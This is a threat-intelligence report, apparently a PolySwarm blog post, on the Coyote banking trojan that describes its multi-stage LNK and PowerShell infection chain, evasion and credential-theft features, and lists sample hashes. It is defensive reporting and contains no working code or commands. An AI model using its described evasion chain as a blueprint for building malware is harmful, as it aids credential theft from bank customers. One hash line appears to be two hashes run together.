Verticals Targeted: Financial
Executive Summary
Coyote, which was first observed in early 2024, is a banking trojan that has targeted over 1030 sites and 73 financial institutions.
Key Takeaways
- Coyote, which was first observed in early 2024, is a banking trojan that has targeted over 1030 sites and 73 financial institutions.
- Unlike traditional banking malware that primarily relies on phishing emails with executable attachments, Coyote takes a stealthier approach, reducing the likelihood of detection by security tools.
- Coyote uses a complex, multi-stage infection chain that relies on LNK files and PowerShell, minimizing the need for traditional executable files.
- PolySwarm analysts consider Coyote to be an evolving threat.
What is Coyote ?
Coyote, which was first observed in early 2024, is a .NET banking trojan that has targeted over 1030 sites and 73 financial institutions. Fortinet recently reported on Coyote.
Unlike traditional banking malware that primarily relies on phishing emails with executable attachments, Coyote takes a stealthier approach, reducing the likelihood of detection by security tools. Fortinet researchers observed multiple LNK file artifacts containing PowerShell commands responsible for delivering Coyote. The LNK files appeared to be delivered to victims via social engineering.
The Coyote infection chain, which is multi-staged and complex, is described below:
- Execution of the LNK File – The victim opens the LNK shortcut file, initiating the embedded PowerShell command.
- Connection to a Command and Control (C2) Server – The PowerShell script reaches out to an attacker-controlled server to fetch additional malicious scripts.
- Execution of Additional Payloads – The downloaded scripts execute various tasks, including modifying system configurations, disabling security tools, and preparing for the deployment of the final payload.
- Deployment of the Coyote Banking Trojan – The malware is installed stealthily, ready to perform its core functionalities.
- Persistence Mechanisms – The Trojan sets up methods to ensure it remains active even after a system reboot.
By breaking up the infection into discrete steps, Coyote ensures that even if one phase is detected, the rest of the attack chain remains intact, making it harder to stop. The use of PowerShell minimizes the need for traditional executable files, helping the malware evade traditional antivirus solutions that primarily scan for suspicious EXE files.
Coyote is capable of keylogging, screenshotting, clipboard hijacking, and using phishing overlays to steal credentials. The newest version of Coyote is capable of targeting 1030 sites and 73 financial institutions. Coyote targets Windows machines and has primarily affected Windows users in Brazil. PolySwarm analysts consider Coyote to be an evolving threat.
IOCs
PolySwarm has multiple samples of Coyote.
362af8118f437f9139556c59437544ae1489376dc4118027c24c8d5ce4d84e48
67f371a683b2be4c8002f89492cd29d96dceabdbfd36641a27be761ee64605b1
7cbfbce482071c6df823f09d83c6868d0b1208e8ceb70147b64c52bb8b48bdb8fd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e
You can use the following CLI command to search for all Coyote samples in our portal:
$ polyswarm link list -f Coyote
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.
